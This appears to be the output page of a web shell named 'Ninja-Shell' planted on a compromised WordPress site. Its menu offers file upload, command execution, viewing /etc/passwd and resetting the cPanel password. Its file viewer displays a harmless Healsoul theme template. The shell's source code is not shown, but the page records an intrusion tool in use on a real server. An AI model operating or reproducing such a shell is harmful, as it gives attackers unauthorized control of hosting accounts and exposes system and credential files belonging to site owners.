{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www//1stopsheba///wp-content/themes/healsoul/archive-case_study.php
<?php /** * The template for displaying archive case study pages. * * Learn more: http://codex.wordpress.org/Template_Hierarchy * * @package Healsoul * @since 1.0 */ get_header(); $style = Healsoul::setting( 'archive_case_study_style' ); $columns = Healsoul::setting( 'archive_case_study_columns' ); $gutter = Healsoul::setting( 'archive_case_study_gutter' ); $row_gutter = Healsoul::setting( 'archive_case_study_row_gutter' ); $image_size = Healsoul::setting( 'archive_case_study_thumbnail_size' ); $animation = Healsoul::setting( 'archive_case_study_animation' ); ?> <?php Healsoul_Templates::title_bar(); ?> <div id="page-content" class="page-content"> <div class="container"> <div class="row"> <?php Healsoul_Templates::render_sidebar( 'left' ); ?> <div class="page-main-content"> <?php if ( have_posts() ) : ?> <?php $args = array(); $args[] = 'style="' . $style . '"'; $args[] = 'columns="' . $columns . '"'; $args[] = 'gutter="' . $gutter . '"'; $args[] = 'row_gutter="' . $row_gutter . '"'; $args[] = 'image_size="' . $image_size . '"'; $args[] = 'animation="' . $animation . '"'; $args[] = 'pagination="pagination"'; $args[] = 'pagination_align="center"'; $args[] = 'main_query="1"'; $shortcode_string = '[tm_case_study ' . implode( ' ', $args ) . ']'; echo do_shortcode( $shortcode_string ); ?> <?php else : get_template_part( 'components/content', 'none' ); endif; ?> </div> <?php Healsoul_Templates::render_sidebar( 'right' ); ?> </div> </div> </div> <?php get_footer();
./Ninja\.